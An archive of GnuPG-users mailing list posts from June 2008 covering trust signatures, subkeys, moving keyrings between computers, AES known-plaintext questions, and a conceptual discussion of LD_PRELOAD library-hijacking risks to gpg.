On Mon, 9 Jun 2008 06:00, eocsor at gmail.com said:

> Would a smartcard address this private key compromising problem?

Yes. As long as you keep physical control over the card. If you lost the card you better consider your key compromised.

Shalom-Salam,

Werner

--
Thoughts are free. Exceptions are regulated by a federal law.

From george.davidescu at gmail.com Mon Jun 9 20:30:59 2008
From: george.davidescu at gmail.com (bezna)
Date: Mon, 9 Jun 2008 11:30:59 -0700 (PDT)
Subject: max-cert-depth and "chains of trust" in GPG
In-Reply-To: <20080606214526.GA1701@jabberwocky.com>
References: <17700504.post@talk.nabble.com> <20080606214526.GA1701@jabberwocky.com>
Message-ID: <17738960.post@talk.nabble.com>

Dear David and GPG users,

Thank you for your clarification and prompt reply. I still have some further questions.

1) On the output of the --check-trustdb command, there is a line for each level of depth in the path of signatures similar to this:

gpg: depth: 3 valid: 1 signed: 0 trust: 1-, 0q, 0n, 0m, 0f, 0u

What does the "trust: 1-" entry stand for? I noticed that this "-1" entry usually accompanies the last hop in the chain of signatures that has made a signature to validate another key. Similarly, I've noticed that sometimes "trust: 0-" appears. What does this mean?

2) I'm a bit confused about the tsign command. I tried setting up some test cases in which there is a chain of tsigns of the form A-->B--C-->D-->E etc., each tsign having been answered with "full trust" and "level 10" at their respective queries during the signing protocol. I was puzzled to find that the same occurred as with "regular" signatures; only those certificates which were signed by someone the owner placed trust in directly were validated, but they were given no trust values (IE their trust was "unknown"). The extra trust information encoded in the trust signature seemed to be lost to GPG, with one exception: the certificates tsigned by the owner himself. I noticed that as soon as those keys who the owner had tsigned were imported, their trust was automatically set to the value given in the tsign, rather than defaulting to "unknown" as with regular signatures. This was not the case for tsigns made further down the line from those who the owner had tsigned.
Am I then to understand that trust in GPG is not transferrable, and that assigning trust can only be done directly by the owner and not delegated to others, even through tsigns? That is to say, there's no way to place confidence in the trust calls made the users whom your own trusted introducers trust, and thus have a propagation of trust down a chain? I was under the impression that the tsign was useful in a system which uses Certificate Authorities (CAs), but the mechanism behind its use is unclear to me. Could you please provide some additional clarification on how tsign is supposed to work in the grand scheme of things? And just how can another user "make a signature on your behalf"?

3) Also on the topic of tsigns, I was wondering what the trust signature levels represented, how they are useful and whether any value greater than 10 (enough to qualify for a 'T') is treated the same.

Many thanks,
George

--
View this message in context: http://www.nabble.com/max-cert-depth-and-%22chains-of-trust%22-in-GPG-tp17700504p17738960.html
Sent from the GnuPG - User mailing list archive at Nabble.com.

From 210525p42015 at denstarfarm.us Tue Jun 10 01:41:54 2008
From: 210525p42015 at denstarfarm.us (RD)
Date: Mon, 09 Jun 2008 19:41:54 -0400
Subject: Switching to new Windows Box
Message-ID: <484DBFC2.4040409@denstarfarm.us>

My friend uses windows. Her company is replacing her laptop. She knows how to re-install gnupg but is unsure what to copy/export and what folder to place the keys on the new box.

What should I tell her or where to I point her to read (RTFM) on the web?

thanks

--
Robert D.

From John at Mozilla-Enigmail.org Tue Jun 10 03:30:22 2008
From: John at Mozilla-Enigmail.org (John Clizbe)
Date: Mon, 09 Jun 2008 20:30:22 -0500
Subject: Switching to new Windows Box
In-Reply-To: <484DBFC2.4040409@denstarfarm.us>
References: <484DBFC2.4040409@denstarfarm.us>
Message-ID: <484DD92E.7040501@Mozilla-Enigmail.org>

RD wrote:
> My friend uses windows. Her company is replacing her laptop. She knows
> how to re-install gnupg but is unsure what to copy/export and what
> folder to place the keys on the new box.
>
> What should I tell her or where to I point her to read (RTFM) on the web?

Copy gpg.conf (if it exists) and the three .gpg files (pubring.gpg, secring.gpg, trustdb.gpg) from %APPDATA%\GnuPG on the old machine to the new machine.

%APPDATA% usually expands to (subject to any localization)
C:\Documents and Settings\\Application Data

Running 'gpg --version' on the old machine will tell the location of the present keys. (Home: ......)

Running 'gpg --version' on the new machine will create the directory as well as show the location.

--
John P. Clizbe                      Inet: John (a) Mozilla-Enigmail.org
You can't spell fiasco without SCO. PGP/GPG KeyID: 0x608D2A10/0x18BB373A
"what's the key to success?" / "two words: good decisions."
"what's the key to good decisions?" / "one word: experience."
"how do i get experience?" / "two words: bad decisions."
"Just how do the residents of Haiku, Hawai'i hold conversations?"

From 210525p42015 at denstarfarm.us Tue Jun 10 04:14:40 2008
From: 210525p42015 at denstarfarm.us (RD)
Date: Mon, 09 Jun 2008 22:14:40 -0400
Subject: Switching to new Windows Box
In-Reply-To: <484DD92E.7040501@Mozilla-Enigmail.org>
References: <484DBFC2.4040409@denstarfarm.us> <484DD92E.7040501@Mozilla-Enigmail.org>
Message-ID: <484DE390.2090203@denstarfarm.us>

John Clizbe said the following, On 6/9/08 9:30 PM:

> Copy gpg.conf (if it exists) and the three .gpg files (pubring.gpg, secring.gpg,

thanks John ... timely !

--
RD
OS/x Leopard

From sdwyer at spykes.id.au Tue Jun 10 03:54:27 2008
From: sdwyer at spykes.id.au (Simon Dwyer)
Date: Tue, 10 Jun 2008 11:54:27 +1000
Subject: Confused about Sub keys.
Message-ID: <1213062867.12670.11.camel@tsg001.mulawa.internal>

Hi everyone,

I am new to all this and have been doing a lot of reading.

One thing I can't get my head around is subkeys. I have generated a sub key with my master key and I understand that. All the commands and things I have been doing I have been using my master key's id... should I be actively using my sub key? or does it just use it as I talk to people?

Cheers,

Simon Dwyer

From faramir.cl at gmail.com Tue Jun 10 06:17:46 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 10 Jun 2008 00:17:46 -0400
Subject: Confused about Sub keys.
In-Reply-To: <1213062867.12670.11.camel@tsg001.mulawa.internal>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal>
Message-ID: <484E006A.3090109@gmail.com>

Simon Dwyer wrote:
> Hi everyone,
>
> I am new to all this and have been doing a lot of reading.
>
> One thing I can't get my head around is subkeys. I have generated a sub
> key with my master key and I understand that. All the commands and things
> I have been doing I have been using my master key's id... should I be
> actively using my sub key? or does it just use it as I talk to people?

Hello, and yes, I think subkeys are confusing... I am still a bit confused... Anyway, there are a few things I understood, and they are:

1.- There are keys used to sign, and other keys used for encrypt/decrypt: DSA keys can sign but not encrypt, Elgamal can encrypt but not sign. RSA can do both functions, but the function intended for it must be defined at the moment of creating the key. And that is the reason to use "key pairs", because a single key can't do both functions.

2.- You can make a key pair using DSA-Elgamal, or RSA(sign)-RSA(encrypt). Maybe you can mix, but I am *not sure* about that.

3.- A key pair is always composed of a primary key (used to sign), and a subkey used to encrypt/decrypt.

4.- You can add more subkeys, for signing and for encrypting. But I don't have any idea about how GnuPG chooses which key it is going to use...

5.- The primary key is the only key that can sign other keys.

6.- But if you have a signing subkey, and an encrypting subkey, you can use these subkeys pair to sign and encrypt... you can even export the secret keys and store them safe, then export the subkeys, delete the key, import the subkeys, and be able to do everything, except to sign other people's keys. You can revoke the subkeys, if they get compromised, and since the primary key would not be compromised, you can import it, make a new subkeys pair, and keep functioning with the same master key ID (so, you would not lose the signatures people have done to your key).

7.- If you delete a subkey used to encrypt, you won't be able to read messages sent to you encrypted for that subkey, so, if you have to revoke a subkey, do it, but never delete it.

And that is all I know about the subject...

So, you don't have to do anything to use your subkey, it is already being used anytime you need to encrypt/decrypt.

Regards

From sdwyer at spykes.id.au Tue Jun 10 06:40:06 2008
From: sdwyer at spykes.id.au (Simon Dwyer)
Date: Tue, 10 Jun 2008 14:40:06 +1000
Subject: Confused about Sub keys.
In-Reply-To: <484E006A.3090109@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com>
Message-ID: <1213072806.2027.3.camel@tsg001.mulawa.internal>

That does make more sense. Still a very confusing topic.

From what I gather the fact that my emails are being signed and everything seems to be working I will not worry about it too much.

Hope this post helps others that come looking later with the same question.

Thanks Faramir,

Simon

From shavital at mac.com Tue Jun 10 08:32:23 2008
From: shavital at mac.com (Charly Avital)
Date: Tue, 10 Jun 2008 02:32:23 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484E006A.3090109@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com>
Message-ID: <484E1FF7.30607@mac.com>

Faramir wrote the following on 6/10/08 12:17 AM:
[...]

> And that is the
> reason to use "key pairs", because a single key can't do both functions.

The above statement is not accurate.

A careful reading of is recommended.

This is the Spanish version:

Attention Simon Dwyer.
The following keys were found on a key server:

(1) Simon Luke Dwyer
    Simon Luke Dwyer (Technology Services Group)
      1024 bit DSA key 9DA5B32F, created: 2008-06-09
(2) Simon Dwyer (SpYkEs)
      1024 bit DSA key 9D826360, created: 2008-06-09 (revoked)
(3) Simon Luke Dwyer (SpYkEs)
      1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked)

Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F, created: 2008-06-09' is the one you are or will be using, since the other two have been revoked.

Thanks in advance.
Charly
[...]

From shavital at mac.com Tue Jun 10 11:01:41 2008
From: shavital at mac.com (Charly Avital)
Date: Tue, 10 Jun 2008 05:01:41 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484E006A.3090109@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com>
Message-ID: <484E42F5.9010701@mac.com>

Faramir wrote the following on 6/10/08 12:17 AM:
[...]

> And that is the
> reason to use "key pairs", because a single key can't do both functions.

The above statement is not accurate.

A careful reading of is recommended.

This is the Spanish version:

Attention Simon Dwyer.
The following keys were found on a key server:

(1) Simon Luke Dwyer
    Simon Luke Dwyer (Technology Services Group)
      1024 bit DSA key 9DA5B32F, created: 2008-06-09
(2) Simon Dwyer (SpYkEs)
      1024 bit DSA key 9D826360, created: 2008-06-09 (revoked)
(3) Simon Luke Dwyer (SpYkEs)
      1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked)

Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F, created: 2008-06-09' is the one you are or will be using, since the other two have been revoked.

Thanks in advance.
Charly
[...]

From chd at chud.net Tue Jun 10 19:41:13 2008
From: chd at chud.net (Chris De Young)
Date: Tue, 10 Jun 2008 10:41:13 -0700
Subject: Confused about Sub keys.
In-Reply-To: <484E006A.3090109@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com>
Message-ID: <484EBCB9.4050805@chud.net>

> it must be defined at the moment of creating the key. And that is the
> reason to use "key pairs", because a single key can't do both functions.

"Key pair" in most contexts actually refers to the set of public key + private key, not to key + subkey(s) -- at least that seems to be the common usage from what I've seen.

Cheers,
-C

From shavital at mac.com Tue Jun 10 20:17:56 2008
From: shavital at mac.com (Charly Avital)
Date: Tue, 10 Jun 2008 14:17:56 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484EBCB9.4050805@chud.net>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484EBCB9.4050805@chud.net>
Message-ID: <484EC554.2090805@mac.com>

Chris De Young wrote the following on 6/10/08 1:41 PM:
>> it must be defined at the moment of creating the key. And that is the
>> reason to use "key pairs", because a single key can't do both functions.
>
> "Key pair" in most contexts actually refers to the set of
> public key + private key, not to key + subkey(s) -- at least that seems to be
> the common usage from what I've seen.
>
> Cheers,
> -C

Chris,

Precisely, that's how it is defined and explained in PGP and OpenPGP related documentation sites.

Charly

From faramir.cl at gmail.com Tue Jun 10 20:39:11 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 10 Jun 2008 14:39:11 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484E1FF7.30607@mac.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com>
Message-ID: <484ECA4F.7020709@gmail.com>

Charly Avital wrote:
> Faramir wrote the following on 6/10/08 12:17 AM:
> [...]
>
>> And that is the
>> reason to use "key pairs", because a single key can't do both functions.
>
> The above statement is not accurate.
>
> A careful reading of is
> recommended.

Well, I made a mistake again... but the manual in that URL doesn't show RSA keys... and when I executed the command gpg --gen-key I get the following options:

(1) DSA and ElGamal (default)
(2) DSA (sign only)
(5) RSA (sign only)

But maybe I have messed the config file, and it is just my computer the one acting like that...

Regards

From jmoore3rd at bellsouth.net Tue Jun 10 20:52:08 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Tue, 10 Jun 2008 14:52:08 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484ECA4F.7020709@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com> <484ECA4F.7020709@gmail.com>
Message-ID: <484ECD58.8000204@bellsouth.net>

Faramir wrote:

> Well, I made a mistake again... but the manual in that URL doesn't
> show RSA keys... and when I executed the command gpg --gen-key I get the
> following options:
>
> (1) DSA and ElGamal (default)
> (2) DSA (sign only)
> (5) RSA (sign only)
>
> But maybe I have messed the config file, and it is just my computer
> the one acting like that...

In order to be offered more Options than the 3 above make sure the single word/line:

expert

is in Your gpg.conf File.

JOHN ;)
Timestamp: Tuesday 10 Jun 2008, 14:51 --400 (Eastern Daylight Time)

From rjh at sixdemonbag.org Tue Jun 10 21:23:50 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Tue, 10 Jun 2008 14:23:50 -0500
Subject: Confused about Sub keys.
In-Reply-To: <484ECA4F.7020709@gmail.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com> <484ECA4F.7020709@gmail.com>
Message-ID: <484ED4C6.306@sixdemonbag.org>

Faramir wrote:
> Well, I made a mistake again... but the manual in that URL doesn't
> show RSA keys... and when I executed the command gpg --gen-key I get
> the following options:

Typing something into GnuPG and learning what it does is great: it teaches you that GnuPG tends to create different keypairs for encryption and signing. However, it doesn't teach you _why_, and it's dangerous to generalize from just that small of an example.

Originally, PGP 2.6 used one keypair to do everything. OpenPGP changed it to two keypairs, one for signing and one for encrypting, for one and only one reason: Flerbage.

Most technical standards committees have a lot of flerbage -- ideas that have a lot of people backing them, although there's a great diversity of opinion about why these ideas should be backed.

Some people thought separate keys gave increased resistance to cryptanalysis. Some people thought separate keys were cool. Some people thought it would be good for the future extensibility of OpenPGP. Some people thought it would be good to allow people to let a signing subkey expire, while leaving the encryption subkey good for the indefinite future. Some people needed DSA, and since DSA is a sign-only algorithm they needed a separate keypair for encryption. Some people said "well, PGP 5 does it this way and we need to be compatible." Etc., etc.

The upshot is "a lot of people thought it was a good idea, even though there was no clear consensus on why."

Warning: it's been years and years since this discussion took place within the OpenPGP WG.
While my recollection is there was no clear consensus on why it was a good idea, it would not be impossible for my memory to be in error.

From sdwyer at spykes.id.au Wed Jun 11 00:38:47 2008
From: sdwyer at spykes.id.au (Simon Dwyer)
Date: Wed, 11 Jun 2008 08:38:47 +1000
Subject: Confused about Sub keys.
In-Reply-To: <484E42F5.9010701@mac.com>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E42F5.9010701@mac.com>
Message-ID: <1213137527.9874.2.camel@tsg001.mulawa.internal>

Yes I made a bit of a mess when first setting up my account. The two revoked keys are ones I got confused with and wanted to start from scratch. The one that isn't revoked is my good key that I am using now.

9DA5B32F is my key that I will be using from now on.

Thanks for the reply guys,

Simon Dwyer

On Tue, 2008-06-10 at 05:01 -0400, Charly Avital wrote:
> Faramir wrote the following on 6/10/08 12:17 AM:
> [...]
>
> > And that is the
> > reason to use "key pairs", because a single key can't do both functions.
>
> The above statement is not accurate.
>
> A careful reading of is
> recommended.
>
> This is the Spanish version:
>
> Attention Simon Dwyer. The following keys were found on a key server:
> (1) Simon Luke Dwyer
> Simon Luke Dwyer (Technology Services Group)
> 1024 bit DSA key 9DA5B32F, created: 2008-06-09
> (2) Simon Dwyer (SpYkEs)
> 1024 bit DSA key 9D826360, created: 2008-06-09 (revoked)
> (3) Simon Luke Dwyer (SpYkEs)
> 1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked)
> Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F,
> created: 2008-06-09' is the one you are or will be using, since the
> other two have been revoked. Thanks in advance.
>
> Charly
>
> [...]

From bahamutzero8825 at gmail.com Wed Jun 11 02:32:16 2008
From: bahamutzero8825 at gmail.com (Andrew Berg)
Date: Wed, 11 Jun 2008 00:32:16 +0000
Subject: One Time Password and GnuPG
In-Reply-To: <484CB4FB.4000600@tx.rr.com>
References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com>
Message-ID: <484F1D10.5090004@gmail.com>

John Clizbe wrote:
> Andrew Berg wrote:
>> Bricks can be hallowed out. :P
>
> HOLY BRICKBATS, BATMAN!!!!!
>
> Would such bricks then be filled with the Holy Spirit to give them strength?
>
> I must assume you meant 'hollowed'.

Yes I did. Of course, little plastic angel-like wings could be added for effect after being /hollowed/ out.

--
Key ID: 0xF88E034060A78FCB
Fingerprint: 4A84 CAE2 A0D3 2AEB 71F6 07FD F88E 0340 60A7 8FCB
Sony PlayStation 3 (64-bit PowerPC compatible architecture) | Video mode: 480i (576x480) | Ubuntu 7.10 | Linux 2.6.24 | GPG 1.4.9/2.0.9 | Thunderbird 2.0.0.14 | Enigmail not installed

From rjh at sixdemonbag.org Wed Jun 11 03:24:25 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Tue, 10 Jun 2008 20:24:25 -0500
Subject: One Time Password and GnuPG
In-Reply-To: <484F1D10.5090004@gmail.com>
References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com> <484F1D10.5090004@gmail.com>
Message-ID: <484F2949.5000306@sixdemonbag.org>

Andrew Berg wrote:
> Yes I did. Of course, little plastic angel-like wings could be added
> for effect after being /hollowed/ out.

Having not seen John's original message come through on GnuPG-Users, I can only assume that you are taking public something that he sent off-list, presumably for good reason.

Please do not do this. It's rude.

From bahamutzero8825 at gmail.com Wed Jun 11 04:16:00 2008
From: bahamutzero8825 at gmail.com (Andrew Berg)
Date: Wed, 11 Jun 2008 02:16:00 +0000
Subject: One Time Password and GnuPG (OT tangent)
In-Reply-To: <484F2949.5000306@sixdemonbag.org>
References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> <484CB4FB.4000600@tx.rr.com> <484F1D10.5090004@gmail.com> <484F2949.5000306@sixdemonbag.org>
Message-ID: <484F3560.4020202@gmail.com>

Robert J. Hansen wrote:
> Having not seen John's original message come through on GnuPG-Users, I
> can only assume that you are taking public something that he sent
> off-list, presumably for good reason.
>
> Please do not do this. It's rude.

I don't do this intentionally. That message was threaded (by Thunderbird) with the rest of the discussion. Plus, the resolution is so low on my monitor (not by choice, but by capability) that header info is not displayed properly (it is possible to display this info, but doing so covers what little space there is to read a message). I'm not trying to make excuses, but that's just how it is. I will pay attention to OT messages more. I see that your message had a carbon copy to the list, so I would assume a reply to the list would be fine.

From japnews at gmx.de Wed Jun 11 04:05:21 2008
From: japnews at gmx.de (Jan Jansen)
Date: Wed, 11 Jun 2008 04:05:21 +0200
Subject: known-plaintext attacks
Message-ID: <484F32E1.9000600@gmx.de>

Hi,

1. Is the AES-Encryption of a file by gnupg vulnerable to known-plaintext attacks ?

2. Does this depend on the length of the plaintext ?

2.1 Is a strong Passphrase even safe, if the size of the known plaintext is just 1 Byte or even 10 GB ?

3. Is it possible for somebody, who does not know the strong Passphrase, to guess reliably, if the encrypted data contains a known file ?

4. Why or Why not (1.,2.,3 )?

Thanks.

JJ

From shavital at mac.com Wed Jun 11 05:22:04 2008
From: shavital at mac.com (Charly Avital)
Date: Tue, 10 Jun 2008 23:22:04 -0400
Subject: Confused about Sub keys.
In-Reply-To: <1213137527.9874.2.camel@tsg001.mulawa.internal>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E42F5.9010701@mac.com> <1213137527.9874.2.camel@tsg001.mulawa.internal>
Message-ID: <484F44DC.3010908@mac.com>

Simon Dwyer wrote the following on 6/10/08 6:38 PM:
> Yes I made a bit of a mess when first setting up my account. The two
> revoked keys are ones I got confused with and wanted to start from
> scratch. The one that isn't revoked is my good key that I am using now.
>
> 9DA5B32F is my key that I will be using from now on.
>
> Thanks for the reply guys,
>
> Simon Dwyer

Thank you for your answer.

OpenPGP Security Info

Good signature from Simon Luke Dwyer
Key ID: 0x9DA5B32F / Signed on: 6/10/08 6:38 PM
Key fingerprint: 6720 2B88 B588 2A2A D314 0863 B79E 09D5 9DA5 B32F

Charly

From dshaw at jabberwocky.com Wed Jun 11 05:24:15 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Tue, 10 Jun 2008 23:24:15 -0400
Subject: known-plaintext attacks
In-Reply-To: <484F32E1.9000600@gmx.de>
References: <484F32E1.9000600@gmx.de>
Message-ID: <5CE20ED4-98FF-43F3-9CD0-4089E62FF6D1@jabberwocky.com>

On Jun 10, 2008, at 10:05 PM, Jan Jansen wrote:

> Hi,
>
> 1. Is the AES-Encryption of a file by gnupg vulnerable to
> known-plaintext attacks ?

No.

> 2. Does this depend on the length of the plaintext ?

No.

> 2.1 Is a strong Passphrase even safe, if the size of the known
> plaintext is just 1 Byte or even 10 GB ?

Yes.

> 3. Is it possible for somebody, who does not know the strong
> Passphrase, to guess reliably, if the encrypted data contains a
> known file ?

Cannot be answered in the context of this question. It depends on the cipher mode.

> 4. Why or Why not (1.,2.,3 )?

http://en.wikipedia.org/wiki/Advanced_Encryption_Standard#Security

David

From michael.graffam at gmail.com Wed Jun 11 16:43:02 2008
From: michael.graffam at gmail.com (michael graffam)
Date: Wed, 11 Jun 2008 10:43:02 -0400
Subject: LD_PRELOAD attack
Message-ID: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>

Has anyone read the article in the most recent 2600 regarding using LD_PRELOAD to eavesdrop on gnupg?

I realize that the actual recovery of a passphrase by this means is no better than a keylogger -- But what concerns me more (and isn't explicitly covered in the article) is the ability to inject false randomness into GPG key generation, or even change the plaintext going in.

I think the advice to statically link a strcmp and getenv into GPG for purposes of checking/scrubbing the environment is a good one.

Sure - you have to trust the machine you're running on - but it seems to me that a basic sanity check would be in order.

Thoughts?

-M

From yalla at fsfe.org Wed Jun 11 18:02:13 2008
From: yalla at fsfe.org (Alexander W. Janssen)
Date: Wed, 11 Jun 2008 18:02:13 +0200
Subject: LD_PRELOAD attack
In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
Message-ID: <484FF705.2050405@fsfe.org>

michael graffam wrote:
> Thoughts?

Run "unset LD_PRELOAD" before running gnupg if you don't trust the system?

It's an inherent feature of the loader. Compiling everything statically only works around this inherent feature/problem, however you call it. And it wouldn't prevent any other keyloggers or flaws in drivers.

Just my 2c though.

> -M

Alex.

From rjh at sixdemonbag.org Wed Jun 11 19:00:09 2008
From: rjh at sixdemonbag.org (Robert J. Hansen)
Date: Wed, 11 Jun 2008 12:00:09 -0500
Subject: LD_PRELOAD attack
In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
Message-ID: <48500499.5020408@sixdemonbag.org>

michael graffam wrote:
> Has anyone read the article in the most recent 2600 regarding using
> LD_PRELOAD to eavesdrop on gnupg?

My reaction to it has been to yawn.

If you don't have physical security on your machine, you don't have any electronic security worth talking about. We've known this for decades now. This is just another example of what happens when people think they can have electronic security without physical control over the hardware.

From michael.graffam at gmail.com Wed Jun 11 18:58:48 2008
From: michael.graffam at gmail.com (michael graffam)
Date: Wed, 11 Jun 2008 12:58:48 -0400
Subject: LD_PRELOAD attack
In-Reply-To: <484FF705.2050405@fsfe.org>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org>
Message-ID: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com>

Not a real solution, because if LD_PRELOAD is already set, then the shell you type unset into might be overloaded as well, already.

You can't trust strcmp() or getenv() either, since the preloaded lib could be hooking them on you. I was able to write a stealthed lib which successfully hides itself from calls to getenv, and ignores attempts to unset env vars.

Manually walking the environment pointer reveals it, of course.

On 6/11/08, Alexander W. Janssen wrote:
> michael graffam wrote:
>> Thoughts?
>
> Run "unset LD_PRELOAD" before running gnupg if you don't trust the system?
>
> It's an inherent feature of the loader. Compiling everything statically
> only works around this inherent feature/problem, however you call it.
> And it wouldn't prevent any other keyloggers or flaws in drivers.
>
> Just my 2c though.
>
>> -M
>
> Alex.

From yalla at fsfe.org Wed Jun 11 19:05:22 2008
From: yalla at fsfe.org (Alexander W. Janssen)
Date: Wed, 11 Jun 2008 19:05:22 +0200
Subject: LD_PRELOAD attack
In-Reply-To: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org> <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com>
Message-ID: <485005D2.7070205@fsfe.org>

michael graffam wrote:
> Not a real solution, because if LD_PRELOAD is already set, then the
> shell you type unset into might be overloaded as well, already.

Now that's very true; but still my opinion is that if you can't trust the system on which you're working, I wouldn't dare to use gnupg anyway.

Sure, you could link everything statically to gnupg, but that'd make maintenance very very hard. For every revision of a dependent lib you'd need to adapt code, ship new source, recompile or ship new binaries. Dependency-hell.

Though a smartcard might help there...

> Manually walking the environment pointer reveals it, of course.

Not exactly sure what you mean there?

Alex.

From Dionysios.Sartoros at SPVM.QC.CA Wed Jun 11 19:13:05 2008
From: Dionysios.Sartoros at SPVM.QC.CA (Sartoros Dionysios)
Date: Wed, 11 Jun 2008 13:13:05 -0400
Subject: Encrypting files for many users..
Message-ID:

Hey,

Question for you guys, new gnupg user here, great software..

I was thinking of maybe encrypting files in PGP that many people will require access to, since I don't know PGP inside and out I was wondering what would be the best method, as sometimes I will have to remove access for some users and add new users

I don't know subkeys or how pgp works with files too well..

Can I add/remove users' keys to encrypted files..

If I have 100 or even 1000 files, would I have to do it one by one (to add a new user or remove access to one)..

Thanks
Dennis

From michael.graffam at gmail.com Wed Jun 11 20:03:47 2008
From: michael.graffam at gmail.com (michael graffam)
Date: Wed, 11 Jun 2008 14:03:47 -0400
Subject: LD_PRELOAD attack
In-Reply-To: <48500499.5020408@sixdemonbag.org>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <48500499.5020408@sixdemonbag.org>
Message-ID: <3e86b22c0806111103g58fafb0bj99cfe26fa67295b5@mail.gmail.com>

How does "physical security" have anything to do with env vars?

I'm not asking for gnupg programmers to try and thwart hardware keyloggers. But just like we ask our software to do the Right Thing with respect to say, defeating buffer overflows, it would be nice to do the Right Thing and check environment sanity.

-M

On 6/11/08, Robert J. Hansen wrote:
> michael graffam wrote:
>> Has anyone read the article in the most recent 2600 regarding using
>> LD_PRELOAD to eavesdrop on gnupg?
>
> My reaction to it has been to yawn.
>
> If you don't have physical security on your machine, you don't have any
> electronic security worth talking about. We've known this for decades
> now. This is just another example of what happens when people think
> they can have electronic security without physical control over the
> hardware.

From faramir.cl at gmail.com Wed Jun 11 20:34:52 2008
From: faramir.cl at gmail.com (Faramir)
Date: Wed, 11 Jun 2008 14:34:52 -0400
Subject: Confused about Sub keys.
In-Reply-To: <484EBCB9.4050805@chud.net>
References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484EBCB9.4050805@chud.net>
Message-ID: <48501ACC.9060907@gmail.com>

Chris De Young wrote:
>> it must be defined at the moment of creating the key. And that is the
>> reason to use "key pairs", because a single key can't do both functions.
>
> "Key pair" in most contexts actually refers to the set of
> public key + private key, not to key + subkey(s) -- at least that seems
> to be the common usage from what I've seen.
>
> Cheers,
> -C

To think I actually had a matter named "security of information", and I learned about the meaning of "key pair", just to forget it 6 months later... I feel ashamed...

From yalla at fsfe.org Wed Jun 11 21:37:15 2008
From: yalla at fsfe.org (Alexander W. Janssen)
Date: Wed, 11 Jun 2008 21:37:15 +0200
Subject: LD_PRELOAD attack
In-Reply-To: <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com>
References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <484FF705.2050405@fsfe.org> <3e86b22c0806110958p4f2a1faq7f618e9d6f69d7e2@mail.gmail.com>
Message-ID: <4850296B.3020707@fsfe.org>

michael graffam wrote:
> Not a real solution, because if LD_PRELOAD is already set, then the
> shell you type unset into might be overloaded as well, already.

OK, that was new to me. I checked it with some simple tests [1] and you're absolutely right. Unsetting doesn't help.

> Manually walking the environment pointer reveals it, of course.

Still not sure, what you're meaning?

But still: The LD_PRELOAD-thing is so fundamental - if you are not in control of your running shell, you have a problem anyway. I don't think it's up to gnupg to solve that problem. It can't even - except static linking which puts you straight into dependency-hell.

Alex.

[1] - some simple LD_PRELOAD tests: https://pastebin.ynfonatic.de/152

> On 6/11/08, Alexander W. Janssen wrote:
> michael graffam wrote:
>>>> Thoughts?
> Run "unset LD_PRELOAD" before running gnupg if you don't trust the system?
>
> It's an inherent feature of the loader. Compiling everything statically
> only works around this inherent feature/problem, however you call it.
> And it wouldn't prevent any other keyloggers or flaws in drivers.
>
> Just my 2c though.
>
>>>> -M
> Alex.
From dshaw at jabberwocky.com Wed Jun 11 21:56:27 2008
From: dshaw at jabberwocky.com (David Shaw)
Date: Wed, 11 Jun 2008 15:56:27 -0400
Subject: LD_PRELOAD attack
In-Reply-To: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com>
